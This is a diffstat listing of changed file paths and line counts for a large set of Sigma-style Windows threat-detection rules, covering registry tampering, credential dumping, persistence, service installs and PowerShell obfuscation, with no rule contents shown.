.../registry_set_bginfo_custom_wmi_query.yml | 9 +- .../registry_set_blackbyte_ransomware.yml | 3 +- ...istry_set_bypass_uac_using_eventviewer.yml | 3 +- ...et_bypass_uac_using_silentcleanup_task.yml | 4 +- .../registry_set_change_rdp_port.yml | 13 +- .../registry_set_change_security_zones.yml | 8 +- ...stry_set_change_sysmon_driver_altitude.yml | 4 +- ...gistry_set_change_winevt_channelaccess.yml | 9 +- .../registry_set_clickonce_trust_prompt.yml | 3 +- ...stry_set_cobaltstrike_service_installs.yml | 12 +- ...istry_set_creation_service_susp_folder.yml | 16 +- ...y_set_creation_service_uncommon_folder.yml | 22 +- ...try_set_cve_2020_1048_new_printer_port.yml | 3 +- ...gistry_set_cve_2022_30190_msdt_follina.yml | 3 +- ...try_set_dbgmanageddebugger_persistence.yml | 10 +- .../registry_set_defender_exclusions.yml | 4 +- ...registry_set_desktop_background_change.yml | 21 +- ...pervisorenforcedcodeintegrity_disabled.yml | 7 +- .../registry_set_dhcp_calloutdll.yml | 4 +- ...istry_set_disable_administrative_share.yml | 4 +- ...gistry_set_disable_autologger_sessions.yml | 3 +- ...registry_set_disable_defender_firewall.yml | 6 +- .../registry_set_disable_function_user.yml | 3 +- ...stry_set_disable_macroruntimescanscope.yml | 3 +- ..._disable_security_center_notifications.yml | 3 +- .../registry_set_disable_system_restore.yml | 3 +- .../registry_set_disable_uac_registry.yml | 4 +- ...y_set_disable_windows_defender_service.yml | 5 +- .../registry_set_disable_winevt_logging.yml | 15 +- ...it_guard_net_protection_on_ms_defender.yml | 3 +- ...t_disabled_microsoft_defender_eventlog.yml | 9 +- ...amper_protection_on_microsoft_defender.yml | 4 +- .../registry_set_disallowrun_execution.yml | 3 +- ...sk_cleanup_handler_autorun_persistence.yml | 19 +- .../registry_set_dns_over_https_enabled.yml | 13 +- ...gistry_set_dns_server_level_plugin_dll.yml | 12 +- .../registry_set_dot_net_etw_tamper.yml | 6 +- ...et_enabling_cor_profiler_env_variables.yml | 3 +- .../registry_set_enabling_turnoffcheck.yml | 3 +- .../registry_set_evtx_file_key_tamper.yml | 4 +- ...ry_set_exploit_guard_susp_allowed_apps.yml | 6 +- .../registry_set_fax_change_service_user.yml | 3 +- .../registry_set_file_association_exefile.yml | 3 +- ...egistry_set_hangs_debugger_persistence.yml | 3 +- .../registry_set_hhctrl_persistence.yml | 3 +- .../registry_set/registry_set_hide_file.yml | 3 +- .../registry_set_hide_function_user.yml | 3 +- ...t_hide_scheduled_task_via_index_tamper.yml | 18 +- ...urity_zone_protocol_defaults_downgrade.yml | 12 +- ...registry_set_ime_non_default_extension.yml | 23 +- .../registry_set_ime_suspicious_paths.yml | 38 +- ...stry_set_install_root_or_ca_certificat.yml | 3 +- ...t_explorer_disable_first_run_customize.yml | 14 +- .../registry_set_legalnotice_susp_message.yml | 4 +- ...y_set_lolbin_onedrivestandaloneupdater.yml | 10 +- ...egistry_set_lsa_disablerestrictedadmin.yml | 18 +- .../registry_set_lsass_usermode_dumping.yml | 4 +- .../registry_set/registry_set_mal_adwind.yml | 4 +- .../registry_set_mal_blue_mockingbird.yml | 4 +- ...istry_set_net_cli_ngenassemblyusagelog.yml | 15 +- ...tsh_help_dll_persistence_susp_location.yml | 39 +- ...netsh_helper_dll_potential_persistence.yml | 15 +- ...registry_set_new_application_appcompat.yml | 6 +- .../registry_set_new_network_provider.yml | 7 +- .../registry_set_odbc_driver_registered.yml | 3 +- ...gistry_set_odbc_driver_registered_susp.yml | 3 +- ...registry_set_office_access_vbom_tamper.yml | 8 +- ...office_disable_protected_view_features.yml | 7 +- .../registry_set_office_enable_dde.yml | 3 +- ...ook_enable_load_macro_provider_on_boot.yml | 3 +- ..._office_outlook_enable_macro_execution.yml | 3 +- ...utlook_enable_unsafe_client_mail_rules.yml | 11 +- ...y_set_office_outlook_security_settings.yml | 4 +- ..._set_office_trust_record_susp_location.yml | 7 +- ...y_set_office_trusted_location_uncommon.yml | 14 +- ...egistry_set_office_vba_warnings_tamper.yml | 7 +- ...ce_app_cpmpat_layer_registerapprestart.yml | 11 +- .../registry_set_persistence_app_paths.yml | 19 +- .../registry_set_persistence_autodial_dll.yml | 3 +- .../registry_set_persistence_chm.yml | 3 +- ...rsistence_com_hijacking_susp_locations.yml | 13 +- ..._persistence_comhijack_psfactorybuffer.yml | 3 +- ...et_persistence_custom_protocol_handler.yml | 13 +- ...et_persistence_event_viewer_events_asp.yml | 5 +- .../registry_set_persistence_globalflags.yml | 7 +- .../registry_set_persistence_ie.yml | 6 +- .../registry_set_persistence_ifilter.yml | 7 +- ...registry_set_persistence_lsa_extension.yml | 10 +- .../registry_set_persistence_mpnotify.yml | 6 +- .../registry_set_persistence_mycomputer.yml | 7 +- ...istry_set_persistence_natural_language.yml | 8 +- .../registry_set_persistence_office_vsto.yml | 6 +- ...stry_set_persistence_outlook_todaypage.yml | 7 +- ...gistry_set_persistence_reflectdebugger.yml | 9 +- .../registry_set_persistence_scrobj_dll.yml | 3 +- .../registry_set_persistence_search_order.yml | 7 +- ...registry_set_persistence_shim_database.yml | 11 +- ...istence_shim_database_susp_application.yml | 3 +- ...stence_shim_database_uncommon_location.yml | 3 +- .../registry_set_persistence_typed_paths.yml | 4 +- .../registry_set_persistence_xll.yml | 3 +- ...istry_set_policies_associations_tamper.yml | 5 +- ...gistry_set_policies_attachments_tamper.yml | 3 +- ...y_set_powershell_enablescripts_enabled.yml | 7 +- ...gistry_set_powershell_execution_policy.yml | 16 +- ...gistry_set_powershell_logging_disabled.yml | 4 +- ...egistry_set_provisioning_command_abuse.yml | 18 +- ...set_renamed_sysinternals_eula_accepted.yml | 16 +- .../registry_set_rpcrt4_etw_tamper.yml | 8 +- ...stry_set_scr_file_executed_by_rundll32.yml | 3 +- .../registry_set_servicedll_hijack.yml | 3 +- .../registry_set_services_etw_tamper.yml | 3 +- .../registry_set_set_nopolicies_user.yml | 3 +- .../registry_set_sip_persistence.yml | 4 +- .../registry_set_sophos_av_tamper.yml | 3 +- .../registry_set_special_accounts.yml | 10 +- ...ry_set_suppress_defender_notifications.yml | 3 +- ...registry_set_susp_keyboard_layout_load.yml | 16 +- ...y_set_susp_pendingfilerenameoperations.yml | 6 +- .../registry_set_susp_printer_driver.yml | 6 +- ...stry_set_susp_reg_persist_explorer_run.yml | 3 +- .../registry_set_susp_run_key_img_folder.yml | 31 +- .../registry_set_susp_service_installed.yml | 15 +- .../registry_set_susp_user_shell_folders.yml | 6 +- .../registry_set_suspicious_env_variables.yml | 73 +- .../registry_set_system_lsa_nolmhash.yml | 14 +- .../registry_set_taskcache_entry.yml | 9 +- .../registry_set_telemetry_persistence.yml | 25 +- ...egistry_set_terminal_server_suspicious.yml | 29 +- ...registry_set_terminal_server_tampering.yml | 49 +- .../registry_set_timeproviders_dllname.yml | 10 +- ...y_set_tls_protocol_old_version_enabled.yml | 3 +- .../registry_set_treatas_persistence.yml | 4 + .../registry_set_turn_on_dev_features.yml | 8 +- .../registry_set_uac_bypass_sdclt.yml | 3 +- .../registry_set_uac_bypass_winsat.yml | 3 +- .../registry_set_uac_bypass_wmp.yml | 6 +- .../registry_set_vbs_payload_stored.yml | 3 +- .../registry_set_wab_dllpath_reg_change.yml | 3 +- ..._set_wdigest_enable_uselogoncredential.yml | 4 +- .../registry_set_windows_defender_tamper.yml | 14 +- ...ry_set_winget_admin_settings_tampering.yml | 6 +- ...istry_set_winget_enable_local_manifest.yml | 7 +- ...set_winlogon_allow_multiple_tssessions.yml | 10 +- .../registry_set_winlogon_notify_key.yml | 10 +- .../win_security_access_token_abuse.yml | 6 +- .../win_security_admin_rdp_login.yml | 4 +- ...er_added_security_enabled_global_group.yml | 11 +- ..._removed_security_enabled_global_group.yml | 11 +- .../win_security_overpass_the_hash.yml | 3 +- .../win_security_pass_the_hash_2.yml | 6 +- .../win_security_rdp_bluekeep_poc_scanner.yml | 3 +- ...scrcons_remote_wmi_scripteventconsumer.yml | 3 +- ..._security_enabled_global_group_deleted.yml | 8 +- ...y_successful_external_remote_rdp_login.yml | 20 +- ...y_successful_external_remote_smb_login.yml | 20 +- .../win_security_susp_failed_logon_source.yml | 21 +- .../win_security_susp_krbrelayup.yml | 3 +- .../win_security_susp_rottenpotato.yml | 3 +- ...in_security_wfp_endpoint_agent_blocked.yml | 148 +- ...rity_aadhealth_mon_agent_regkey_access.yml | 11 +- ...rity_aadhealth_svc_agent_regkey_access.yml | 16 +- ...ecurity_account_backdoor_dcsync_rights.yml | 19 +- .../win_security_account_discovery.yml | 25 +- ...ity_ad_replication_non_machine_account.yml | 7 +- .../win_security_ad_user_enumeration.yml | 28 +- ...e_template_configuration_vulnerability.yml | 4 +- ...mplate_configuration_vulnerability_eku.yml | 10 +- .../win_security_add_remove_computer.yml | 3 +- .../win_security_admin_share_access.yml | 3 +- ...ty_alert_active_directory_user_control.yml | 8 +- .../win_security_alert_ad_user_backdoors.yml | 15 +- ..._security_alert_enable_weak_encryption.yml | 22 +- .../security/win_security_atsvc_task.yml | 8 +- .../win_security_audit_log_cleared.yml | 14 +- ...security_cobaltstrike_service_installs.yml | 12 +- ...n_security_codeintegrity_check_failure.yml | 6 +- ...ecurity_dce_rpc_smb_spoolss_named_pipe.yml | 6 +- .../win_security_dcom_iertutil_dll_hijack.yml | 4 +- .../win_security_disable_event_auditing.yml | 61 +- ...curity_disable_event_auditing_critical.yml | 42 +- .../win_security_dot_net_etw_tamper.yml | 4 +- ...rity_dpapi_domain_backupkey_extraction.yml | 3 +- ..._dpapi_domain_masterkey_backup_attempt.yml | 6 +- .../security/win_security_external_device.yml | 3 +- .../win_security_gpo_scheduledtasks.yml | 11 +- .../win_security_hidden_user_creation.yml | 3 +- .../security/win_security_hktl_nofilter.yml | 9 +- ...y_hybridconnectionmgr_svc_installation.yml | 3 +- .../security/win_security_impacket_psexec.yml | 5 +- .../win_security_impacket_secretdump.yml | 5 +- ...oke_obfuscation_clip_services_security.yml | 10 +- ...ation_obfuscated_iex_services_security.yml | 24 +- ...ke_obfuscation_stdin_services_security.yml | 9 +- ...voke_obfuscation_var_services_security.yml | 12 +- ...scation_via_compress_services_security.yml | 9 +- ...fuscation_via_rundll_services_security.yml | 9 +- ...bfuscation_via_stdin_services_security.yml | 9 +- ...scation_via_use_clip_services_security.yml | 9 +- ...cation_via_use_mshta_services_security.yml | 9 +- ...ion_via_use_rundll32_services_security.yml | 9 +- ..._obfuscation_via_var_services_security.yml | 12 +- .../security/win_security_iso_mount.yml | 3 +- .../security/win_security_lm_namedpipe.yml | 12 +- ...curity_lsass_access_non_system_account.yml | 17 +- .../security/win_security_mal_creddumper.yml | 13 +- .../win_security_mal_service_installs.yml | 10 +- .../security/win_security_mal_wceaux_dll.yml | 3 +- ...win_security_metasploit_authentication.yml | 2 +- ...or_impacket_smb_psexec_service_install.yml | 15 +- ...cobaltstrike_getsystem_service_install.yml | 16 +- .../win_security_net_ntlm_downgrade.yml | 5 +- ...ecurity_net_share_obj_susp_desktop_ini.yml | 4 +- ..._renamed_user_account_with_dollar_sign.yml | 4 +- .../win_security_not_allowed_rdp_access.yml | 10 +- ...in_security_password_policy_enumerated.yml | 4 +- .../security/win_security_pcap_drivers.yml | 6 +- .../win_security_petitpotam_network_share.yml | 5 +- ...n_security_petitpotam_susp_tgt_request.yml | 28 +- .../win_security_possible_dc_shadow.yml | 13 +- ...powershell_script_installed_as_service.yml | 7 +- ...urity_protected_storage_service_access.yml | 3 +- .../win_security_rdp_reverse_tunnel.yml | 8 +- ...ty_registry_permissions_weakness_check.yml | 19 +- ...win_security_remote_powershell_session.yml | 3 +- .../win_security_replay_attack_detected.yml | 3 +- ...n_security_scm_database_handle_failure.yml | 4 +- ...service_install_remote_access_software.yml | 38 +- ..._service_installation_by_unusal_client.yml | 14 +- ...ecurity_smb_file_creation_admin_shares.yml | 3 +- .../win_security_susp_add_sid_history.yml | 5 +- .../win_security_susp_computer_name.yml | 1 + ...win_security_susp_dsrm_password_change.yml | 3 +- ...win_security_susp_failed_logon_reasons.yml | 15 +- ...in_security_susp_kerberos_manipulation.yml | 3 +- .../win_security_susp_ldap_dataexchange.yml | 13 +- ...security_susp_local_anon_logon_created.yml | 4 +- ...curity_susp_logon_explicit_credentials.yml | 3 +- .../security/win_security_susp_lsass_dump.yml | 3 +- .../win_security_susp_lsass_dump_generic.yml | 41 +- .../win_security_susp_net_recon_activity.yml | 10 +- ...win_security_susp_opened_encrypted_zip.yml | 5 +- ...ity_susp_opened_encrypted_zip_filename.yml | 4 +- ...rity_susp_opened_encrypted_zip_outlook.yml | 3 +- ...rity_susp_outbound_kerberos_connection.yml | 11 +- ...susp_possible_shadow_credentials_added.yml | 25 +- .../security/win_security_susp_psexec.yml | 9 +- ...n_security_susp_raccess_sensitive_fext.yml | 4 +- ..._security_susp_scheduled_task_creation.yml | 7 +- ..._susp_scheduled_task_delete_or_disable.yml | 26 +- ...in_security_susp_scheduled_task_update.yml | 8 +- .../win_security_susp_time_modification.yml | 10 +- .../win_security_svcctl_remote_service.yml | 8 +- .../win_security_syskey_registry_access.yml | 3 +- ...rity_sysmon_channel_reference_deletion.yml | 5 +- .../win_security_tap_driver_installation.yml | 10 +- ...security_teams_suspicious_objectaccess.yml | 3 +- ...iles_with_cred_data_via_network_shares.yml | 10 +- ...ity_user_added_to_local_administrators.yml | 3 +- ...l_priv_service_lsaregisterlogonprocess.yml | 6 +- .../security/win_security_user_creation.yml | 4 +- .../win_security_user_driver_loaded.yml | 25 +- .../security/win_security_user_logoff.yml | 3 +- ..._vssaudit_secevent_source_registration.yml | 6 +- ..._defender_exclusions_registry_modified.yml | 20 +- ...ndows_defender_exclusions_write_access.yml | 26 +- ...dows_defender_exclusions_write_deleted.yml | 19 +- .../security/win_security_wmi_persistence.yml | 7 +- ..._security_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- .../win_security_workstation_was_locked.yml | 27 +- ...mitigations_defender_load_unsigned_dll.yml | 6 +- ...ations_unsigned_dll_from_susp_location.yml | 3 +- ...win_shell_core_susp_packages_installed.yml | 7 +- ...lient_security_susp_failed_guest_logon.yml | 3 +- .../lsasrv/win_system_lsasrv_ntlmv1.yml | 4 +- .../win_system_susp_dhcp_config.yml | 3 +- .../win_system_susp_dhcp_config_failed.yml | 3 +- .../win_system_exploit_cve_2021_42287.yml | 21 +- .../win_system_lpe_indicators_tabtip.yml | 9 +- .../win_system_eventlog_cleared.yml | 19 +- .../win_system_susp_eventlog_cleared.yml | 13 +- ...stem_kdcsvc_cert_use_no_strong_mapping.yml | 24 +- .../win_system_kdcsvc_rc4_downgrade.yml | 5 +- .../win_system_susp_sam_dump.yml | 3 +- ..._vuln_cve_2022_21919_or_cve_2021_34484.yml | 5 +- .../win_system_susp_system_update_error.yml | 13 +- ...gon_exploitation_using_wellknown_tools.yml | 4 +- .../netlogon/win_system_vul_cve_2020_1472.yml | 5 +- .../ntfs/win_system_ntfs_vuln_exploit.yml | 3 +- ...n_system_cobaltstrike_service_installs.yml | 8 +- .../win_system_defender_disabled.yml | 11 +- .../win_system_hack_smbexec.yml | 2 +- ...ystem_invoke_obfuscation_clip_services.yml | 2 +- ...ke_obfuscation_obfuscated_iex_services.yml | 17 +- ...stem_invoke_obfuscation_stdin_services.yml | 13 +- ...system_invoke_obfuscation_var_services.yml | 5 +- ...voke_obfuscation_via_compress_services.yml | 2 +- ...invoke_obfuscation_via_rundll_services.yml | 2 +- ..._invoke_obfuscation_via_stdin_services.yml | 3 +- ...voke_obfuscation_via_use_clip_services.yml | 2 +- ...oke_obfuscation_via_use_mshta_services.yml | 2 +- ..._obfuscation_via_use_rundll32_services.yml | 2 +- ...em_invoke_obfuscation_via_var_services.yml | 5 +- ...system_krbrelayup_service_installation.yml | 4 +- .../win_system_mal_creddumper.yml | 6 +- ...tstrike_getsystem_service_installation.yml | 9 +- .../win_system_moriya_rootkit.yml | 3 +- .../win_system_service_install_anydesk.yml | 3 +- .../win_system_service_install_csexecsvc.yml | 5 +- .../win_system_service_install_hacktools.yml | 2 +- .../win_system_service_install_mesh_agent.yml | 7 +- ...tem_service_install_netsupport_manager.yml | 12 +- .../win_system_service_install_paexec.yml | 4 +- .../win_system_service_install_pdqdeploy.yml | 18 +- ...ystem_service_install_pdqdeploy_runner.yml | 14 +- ...ystem_service_install_pua_proceshacker.yml | 3 +- .../win_system_service_install_remcom.yml | 4 +- ...service_install_remote_access_software.yml | 32 +- ...ystem_service_install_remote_utilities.yml | 16 +- .../win_system_service_install_sliver.yml | 3 +- ...tem_service_install_sups_unusal_client.yml | 7 +- .../win_system_service_install_susp.yml | 12 +- ...em_service_install_sysinternals_psexec.yml | 4 +- ...win_system_service_install_tacticalrmm.yml | 7 +- .../win_system_service_install_tap_driver.yml | 3 +- .../win_system_service_install_uncommon.yml | 25 +- ...ystem_service_terminated_error_generic.yml | 9 +- ...tem_service_terminated_error_important.yml | 46 +- ...system_service_terminated_unexpectedly.yml | 18 +- ...n_system_susp_rtcore64_service_install.yml | 3 +- ...sp_service_installation_folder_pattern.yml | 4 +- ...win_system_rdp_potential_cve_2019_0708.yml | 1 + ...cheduler_execution_from_susp_locations.yml | 14 +- ...er_lolbin_execution_via_task_scheduler.yml | 19 +- ...win_taskscheduler_susp_schtasks_delete.yml | 16 +- .../win_terminalservices_rdp_ngrok.yml | 3 +- .../posh_pc_alternate_powershell_hosts.yml | 15 +- .../posh_pm_susp_netfirewallrule_recon.yml | 3 +- .../posh_ps_compress_archive_usage.yml | 11 +- .../posh_ps_mailbox_access.yml | 5 +- .../posh_ps_new_smbmapping_quic.yml | 11 +- .../posh_ps_registry_reconnaissance.yml | 13 +- .../posh_ps_remove_item_path.yml | 3 +- .../posh_ps_win_api_functions_access.yml | 16 +- .../posh_ps_win_api_library_access.yml | 20 +- .../proc_creation_win_csc_compilation.yml | 14 +- .../proc_creation_win_curl_download.yml | 19 +- .../proc_creation_win_curl_execution.yml | 11 +- .../proc_creation_win_curl_fileupload.yml | 21 +- .../proc_creation_win_curl_useragent.yml | 6 +- ...roc_creation_win_dfsvc_child_processes.yml | 8 +- ..._creation_win_diskshadow_child_process.yml | 22 +- ...oc_creation_win_diskshadow_script_mode.yml | 29 +- ...oc_creation_win_findstr_password_recon.yml | 27 +- .../proc_creation_win_net_quic.yml | 21 +- ...roc_creation_win_office_svchost_parent.yml | 13 +- ...n_powershell_abnormal_commandline_size.yml | 21 +- ...eation_win_powershell_crypto_namespace.yml | 30 +- ..._creation_win_powershell_import_module.yml | 22 +- ...on_win_regsvr32_dllregisterserver_exec.yml | 48 +- ...reation_win_rundll32_dllregisterserver.yml | 25 +- ...c_creation_win_susp_compression_params.yml | 5 +- ...reation_win_susp_elevated_system_shell.yml | 29 +- ...proc_creation_win_susp_event_log_query.yml | 30 +- ...win_susp_file_permission_modifications.yml | 28 +- .../proc_creation_win_taskkill_execution.yml | 20 +- ...oc_creation_win_wmic_recon_system_info.yml | 28 +- .../registry_set_office_trusted_location.yml | 11 +- ...gistry_set_powershell_crypto_namespace.yml | 16 +- .../win_security_scheduled_task_deletion.yml | 13 +- ...h_ps_cl_mutexverifiers_lolscript_count.yml | 3 +- ..._correlation_apt_silence_downloader_v3.yml | 9 +- ..._correlation_apt_turla_commands_medium.yml | 6 +- ...tion_dnscat2_powershell_implementation.yml | 11 +- ...tion_win_correlation_multiple_susp_cli.yml | 5 +- ...orrelation_susp_builtin_commands_recon.yml | 44 +- ...d_cmd_and_powershell_spawned_processes.yml | 10 +- ..._party_drivers_exploits_token_stealing.yml | 7 +- .../unsupported/win_mal_service_installs.yml | 7 +- ...or_impacket_smb_psexec_service_install.yml | 8 +- .../unsupported/win_remote_schtask.yml | 7 +- ...in_security_global_catalog_enumeration.yml | 7 +- .../win_security_rare_schtasks_creations.yml | 9 +- ...usp_failed_logons_explicit_credentials.yml | 8 +- ...rity_susp_failed_logons_single_process.yml | 6 +- ...urity_susp_failed_logons_single_source.yml | 6 +- ...rity_susp_failed_logons_single_source2.yml | 10 +- ...p_failed_logons_single_source_kerberos.yml | 6 +- ..._failed_logons_single_source_kerberos2.yml | 6 +- ..._failed_logons_single_source_kerberos3.yml | 6 +- ..._susp_failed_logons_single_source_ntlm.yml | 8 +- ...susp_failed_logons_single_source_ntlm2.yml | 8 +- ...usp_failed_remote_logons_single_source.yml | 6 +- ...susp_multiple_files_renamed_or_deleted.yml | 7 +- .../win_security_susp_samr_pwset.yml | 15 +- .../win_system_rare_service_installs.yml | 4 +- ...in_taskscheduler_rare_schtask_creation.yml | 10 +- sigma/builtin/win_alert_mimikatz_keywords.yml | 6 +- ..._defender_antimalware_platform_expired.yml | 15 +- .../win_defender_asr_lsass_access.yml | 4 +- .../windefend/win_defender_asr_psexec_wmi.yml | 6 +- ...defender_config_change_exclusion_added.yml | 2 +- ...der_config_change_exploit_guard_tamper.yml | 18 +- ...onfig_change_sample_submission_consent.yml | 17 +- .../windefend/win_defender_history_delete.yml | 2 +- ...defender_malware_and_pua_scan_disabled.yml | 11 +- ..._defender_malware_detected_amsi_source.yml | 2 +- ...defender_real_time_protection_disabled.yml | 15 +- ...n_defender_real_time_protection_errors.yml | 18 +- .../win_defender_restored_quarantine_file.yml | 2 +- ...defender_suspicious_features_tampering.yml | 18 +- ...win_defender_tamper_protection_trigger.yml | 8 +- .../builtin/windefend/win_defender_threat.yml | 10 +- .../win_defender_virus_scan_disabled.yml | 8 +- sigma/builtin/wmi/win_wmi_persistence.yml | 10 +- ...ate_remote_thread_win_hktl_cactustorch.yml | 4 +- ...te_remote_thread_win_hktl_cobaltstrike.yml | 3 +- .../create_remote_thread_win_keepass.yml | 3 +- .../create_remote_thread_win_loadlibrary.yml | 3 +- ..._remote_thread_win_mstsc_susp_location.yml | 10 +- ...emote_thread_win_password_dumper_lsass.yml | 10 +- ...ate_remote_thread_win_powershell_lsass.yml | 8 +- ...ote_thread_win_powershell_susp_targets.yml | 8 +- ...emote_thread_win_uncommon_source_image.yml | 17 +- ...emote_thread_win_uncommon_target_image.yml | 7 +- .../create_stream_hash_ads_executable.yml | 7 +- ...ate_stream_hash_creation_internet_file.yml | 16 +- ...haring_domains_download_susp_extension.yml | 9 +- ...ing_domains_download_unusual_extension.yml | 9 +- ...eate_stream_hash_hktl_generic_download.yml | 415 +- ...eate_stream_hash_regedit_export_to_ads.yml | 3 +- ...stream_hash_winget_susp_package_source.yml | 4 +- .../create_stream_hash_zip_tld_download.yml | 6 +- ...e_thread_win_susp_remote_thread_target.yml | 21 +- .../driver_load_win_mal_creddumper.yml | 10 +- .../driver_load_win_mal_poortry_driver.yml | 45 +- ...powershell_script_installed_as_service.yml | 4 +- ...oad_win_vuln_avast_anti_rootkit_driver.yml | 13 +- .../driver_load_win_vuln_dell_driver.yml | 21 +- .../driver_load_win_vuln_drivers_names.yml | 11 +- .../driver_load_win_vuln_gigabyte_driver.yml | 21 +- .../driver_load_win_vuln_hw_driver.yml | 27 +- .../driver_load_win_vuln_lenovo_driver.yml | 9 +- .../file_event_win_hktl_createminidump.yml | 7 +- ...nt_win_lsass_memory_dump_file_creation.yml | 6 +- ...ile_event_win_mimikatz_memssp_log_file.yml | 4 +- .../file_event_win_susp_clr_logs.yml | 9 +- ..._alternate_powershell_hosts_moduleload.yml | 24 +- .../image_load_side_load_advapi32.yml | 3 +- .../deprecated/image_load_side_load_scm.yml | 7 +- .../image_load_side_load_svchost_dlls.yml | 15 +- .../image_load_susp_winword_wmidll_load.yml | 1 + .../pipe_created_psexec_pipes_artifacts.yml | 7 +- ...ccess_win_in_memory_assembly_execution.yml | 85 +- .../proc_access_win_lsass_susp_access.yml | 37 +- ...ss_win_pypykatz_cred_dump_lsass_access.yml | 2 +- ...proc_creation_win_apt_apt29_thinktanks.yml | 5 +- .../proc_creation_win_apt_gallium.yml | 7 +- .../proc_creation_win_apt_hurricane_panda.yml | 10 +- ...reation_win_apt_lazarus_activity_apr21.yml | 9 +- .../proc_creation_win_apt_lazarus_loader.yml | 14 +- ..._creation_win_apt_muddywater_dnstunnel.yml | 2 +- .../proc_creation_win_apt_ta505_dropper.yml | 7 +- ...c_creation_win_certutil_susp_execution.yml | 12 +- .../proc_creation_win_cmd_read_contents.yml | 20 +- ...oc_creation_win_cmd_redirect_to_stream.yml | 7 +- ...tial_acquisition_registry_hive_dumping.yml | 8 +- .../proc_creation_win_cscript_vbs.yml | 14 +- ...ion_mssql_xp_cmdshell_stored_procedure.yml | 16 +- .../proc_creation_win_indirect_cmd.yml | 6 +- ...in_indirect_command_execution_forfiles.yml | 12 +- ...tion_win_invoke_obfuscation_via_rundll.yml | 4 +- ...in_invoke_obfuscation_via_use_rundll32.yml | 4 +- ...eation_win_lolbas_execution_of_wuauclt.yml | 7 +- .../proc_creation_win_lolbin_findstr.yml | 20 +- .../proc_creation_win_lolbin_office.yml | 5 +- .../proc_creation_win_lolbin_rdrleakdiag.yml | 4 +- ...ion_win_lolbins_by_office_applications.yml | 7 +- .../deprecated/proc_creation_win_mal_ryuk.yml | 8 +- ...on_win_malware_trickbot_recon_activity.yml | 10 +- .../proc_creation_win_mavinject_proc_inj.yml | 2 +- .../proc_creation_win_msdt_diagcab.yml | 9 +- ...proc_creation_win_new_service_creation.yml | 4 +- ...tion_win_nslookup_pwsh_download_cradle.yml | 7 +- .../proc_creation_win_odbcconf_susp_exec.yml | 10 +- ..._from_proxy_executing_regsvr32_payload.yml | 23 +- ...from_proxy_executing_regsvr32_payload2.yml | 23 +- ...on_win_office_spawning_wmi_commandline.yml | 8 +- ...creation_win_possible_applocker_bypass.yml | 16 +- ...n_powershell_amsi_bypass_pattern_nov22.yml | 5 +- ..._powershell_base64_invoke_susp_cmdlets.yml | 12 +- ...n_powershell_base64_listing_shadowcopy.yml | 3 +- ...eation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_bitsjob.yml | 2 +- ...on_win_powershell_service_modification.yml | 15 +- ...ion_win_powershell_xor_encoded_command.yml | 22 +- .../proc_creation_win_reg_dump_sam.yml | 12 +- .../proc_creation_win_regsvr32_anomalies.yml | 24 +- .../proc_creation_win_renamed_paexec.yml | 25 +- .../proc_creation_win_renamed_powershell.yml | 3 +- .../proc_creation_win_renamed_psexec.yml | 3 +- .../proc_creation_win_renamed_rundll32.yml | 3 +- ...reation_win_root_certificate_installed.yml | 18 +- .../proc_creation_win_run_from_zip.yml | 3 +- ...roc_creation_win_sc_delete_av_services.yml | 25 +- .../proc_creation_win_schtasks_user_temp.yml | 4 +- .../proc_creation_win_service_stop.yml | 31 +- .../proc_creation_win_susp_bitstransfer.yml | 5 +- ...eation_win_susp_cmd_exectution_via_wmi.yml | 7 +- ...oc_creation_win_susp_commandline_chars.yml | 27 +- ...c_creation_win_susp_lolbin_non_c_drive.yml | 15 +- .../proc_creation_win_susp_run_folder.yml | 19 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 12 +- ..._sysinternals_psexec_service_execution.yml | 6 +- ...eation_win_sysinternals_psexesvc_start.yml | 2 +- .../proc_creation_win_whoami_as_system.yml | 9 +- .../proc_creation_win_winword_dll_load.yml | 2 +- ..._win_wmic_execution_via_office_process.yml | 15 +- .../proc_creation_win_wmic_remote_command.yml | 6 +- .../proc_creation_win_wmic_remote_service.yml | 24 +- .../proc_creation_win_wuauclt_execution.yml | 8 +- ..._creation_syncappvpublishingserver_exe.yml | 5 +- ...add_sysinternals_sdelete_registry_keys.yml | 5 +- ...istry_event_asep_reg_keys_modification.yml | 23 +- ...sing_windows_telemetry_for_persistence.yml | 14 +- .../registry_set_add_hidden_user.yml | 3 +- ...ble_microsoft_office_security_features.yml | 5 + .../registry_set_office_security.yml | 3 +- .../registry_set_silentprocessexit.yml | 3 +- .../sysmon_dcom_iertutil_dll_hijack.yml | 4 +- .../sysmon_mimikatz_detection_lsass.yml | 4 +- ...sysmon_powershell_execution_moduleload.yml | 2 +- .../deprecated/sysmon_rclone_execution.yml | 7 +- .../win_dsquery_domain_trust_discovery.yml | 12 +- .../deprecated/win_susp_esentutl_activity.yml | 6 +- .../deprecated/win_susp_rclone_exec.yml | 5 +- .../win_susp_vssadmin_ntds_activity.yml | 5 +- .../dns_query_win_anonymfiles_com.yml | 7 +- .../dns_query/dns_query_win_appinstaller.yml | 11 +- ...dns_query_win_devtunnels_communication.yml | 18 +- ...in_dns_server_discovery_via_ldap_query.yml | 4 +- ...ery_win_hybridconnectionmgr_servicebus.yml | 6 +- .../dns_query_win_mal_cobaltstrike.yml | 7 +- .../dns_query/dns_query_win_mega_nz.yml | 4 +- .../dns_query_win_regsvr32_dns_query.yml | 4 +- ...e_access_software_domains_non_browsers.yml | 53 +- .../dns_query_win_susp_external_ip_lookup.yml | 13 +- ...eamviewer_domain_query_by_uncommon_app.yml | 8 +- .../dns_query_win_tor_onion_domain_query.yml | 4 +- .../dns_query_win_ufile_io_query.yml | 10 +- ..._query_win_vscode_tunnel_communication.yml | 18 +- .../driver_load_win_mal_drivers_names.yml | 7 +- .../driver_load_win_pua_process_hacker.yml | 7 +- .../driver_load_win_pua_system_informer.yml | 7 +- .../driver_load_win_susp_temp_use.yml | 3 +- .../driver_load_win_vuln_drivers_names.yml | 10 +- .../driver_load_win_vuln_hevd_driver.yml | 12 +- .../driver_load_win_vuln_winring0_driver.yml | 3 +- .../driver_load/driver_load_win_windivert.yml | 4 +- .../Axiom/proc_creation_win_apt_zxshell.yml | 2 +- ...eation_win_apt_turla_commands_critical.yml | 2 +- ...oc_creation_win_apt_turla_comrat_may20.yml | 4 +- ...roc_creation_win_exploit_cve_2015_1641.yml | 3 +- ...roc_creation_win_exploit_cve_2017_0261.yml | 6 +- ...oc_creation_win_exploit_cve_2017_11882.yml | 3 +- 